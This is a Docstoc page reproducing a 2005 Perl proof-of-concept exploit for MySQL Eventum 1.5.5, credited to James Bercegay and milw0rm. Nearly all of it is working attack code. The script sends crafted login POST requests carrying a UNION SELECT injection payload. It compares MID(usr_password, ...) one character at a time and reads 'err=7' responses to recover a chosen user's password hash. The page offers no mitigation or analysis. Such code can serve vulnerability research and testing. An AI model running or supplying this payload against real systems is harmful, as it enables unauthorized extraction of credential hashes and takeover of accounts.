MySQL Eventum 1.5.5 login.php SQL Injection Exploit

Document Sample
MySQL Eventum 1.5.5 login.php SQL Injection Exploit Powered By Docstoc
					                                   MySQL Eventum 1.5.5 login.php SQL Injection Exploit                                             Page 1/2
  1    #!/usr/bin/perl −w
  2    use IO::Socket;
  3    use strict;
  4
  5    print   "#################################\n";
  6    print   "# MySQL Eventum <= v1.5.5 SQL Injection PoC #\n";
  7    print   "# James Bercegay // gulftech.org // 7−28−05 #\n";
  8    print   "#################################\n";
  9
  10   my   $host   =   ’localhost’;
  11   my   $path   =   ’/eventum/login.php’;
  12   my   $user   =   ’2’;
  13   my   $port   =   80;
  14   my   $pass   =   ’’;
  15
  16   my @char = (’0’,’1’,’2’,’3’,’4’,’5’,’6’,’7’,’8’,’9’,’a’,’b’,’c’,’d’,’e’,’f’);
  17
  18   print "[*] Trying $host\n";
  19
  20   OUTER: for       ( my $i = 1; $i < 33; $i++ )
  21   {
  22   INNER: for       ( my $j=0; $j < 16; $j++ )
  23   {
  24   my $used =       $char[$j];
  25   my $sock =       IO::Socket::INET−>new( PeerAddr => $host, PeerPort => $port, Proto => ’tcp’ ) || die "[!] Unable to connect to $host\
       n";
  26
  27   my $post = "cat=login&url=&email=%27+UNION+SELECT+%273355d92c04a3332339b767f9278405ff%27+FROM+eventum_user+WHERE+usr_id=$user+AND+M
       ID(usr_password,$i,1)=’$used’%2F*&passwd=dance&Submit=Login";
  28   my $send = "POST $path HTTP/1.1\r\n";
  29   $send .= "Host: $host\r\n";
  30   $send .= "User−Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en−US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\r\n";
  31   $send .= "Connection: Keep−Alive\r\n";
  32   $send .= "Content−type: application/x−www−form−urlencoded\r\n";
  33   $send .= "Content−length: ".length($post)."\r\n\r\n";
  34   $send .= "$post\r\n\r\n";
  35
  36   print $sock $send;
  37
  38   while ( my $line = <$sock> )
  39   {
  40   if ( $line =~ /(.*)err=7(.*)/is )
  41   {
  42   $pass .= $used;
  43   print "[+] Char $i is $used\n";
  44   last INNER;
  45   }
  46   #/if
  47   }
  48   #/while
  49
  50   close($sock);
James Bercegay                                                                                                                     08/05/2005
                                 MySQL Eventum 1.5.5 login.php SQL Injection Exploit   Page 2/2
  51   }
  52   #/for INNER
  53
  54   if ( length($pass) < 1 )
  55   {
  56   print "[!] Host not vulnerable!";
  57   exit;
  58   }
  59   }
  60   #/for OUTER
  61
  62   print "[+] Pass hash is $pass\n";
  63   exit;
  64
  65   # milw0rm.com [2005−08−05]




James Bercegay                                                                         08/05/2005

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:73
posted:5/24/2010
language:English
pages:2